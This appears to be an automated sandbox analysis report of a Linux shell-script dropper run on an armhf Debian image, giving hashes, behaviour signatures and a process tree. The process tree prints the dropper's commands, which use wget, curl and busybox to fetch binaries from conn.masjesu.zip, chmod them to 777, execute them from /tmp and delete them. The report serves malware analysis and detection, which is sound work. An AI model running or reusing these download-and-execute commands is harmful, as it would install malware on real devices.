Analysis

  • max time kernel
    149s
  • max time network
    11s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    28/10/2024, 01:45

General

  • Target

    68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh

  • Size

    10KB

  • MD5

    cd798da264eea2cb34f14ab849c4c0e3

  • SHA1

    f8107efcd9299b6364ce3648717b2ecc577cc05a

  • SHA256

    68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617

  • SHA512

    886db5cb7ff8566ea8507ce0cb56df8dc2dd51d8a5e7ac27a67d2a19da607232b90918a184ceb91dafc01fdecdfa552185580c40db363b5fa153849afda32cdc

  • SSDEEP

    192:G3T4hJ8AQ4mPmfmympmFm8/bfTUJhdWA3T4hJFfTUJh3mPmfmympmFm8o:uAQJeO3kY8/YW9eO3kY8o

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 4 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 5 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh
    /tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh
    1⤵
      PID:675
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:678
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw
          2⤵
          • System Network Configuration Discovery
          PID:683
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:691
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw
          2⤵
          • System Network Configuration Discovery
          PID:703
        • /bin/chmod
          chmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw
          2⤵
          • File and Directory Permissions Modification
          PID:705
        • /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw
          ./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw
          2⤵
          • Executes dropped EXE
          PID:706
        • /bin/rm
          rm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw
          2⤵
            PID:707
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF
            2⤵
            • System Network Configuration Discovery
            PID:709
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • System Network Configuration Discovery
            PID:712

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw

          Filesize

          153B

          MD5

          998368d7c95ea4293237f2320546e440

          SHA1

          30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

          SHA256

          533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

          SHA512

          648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97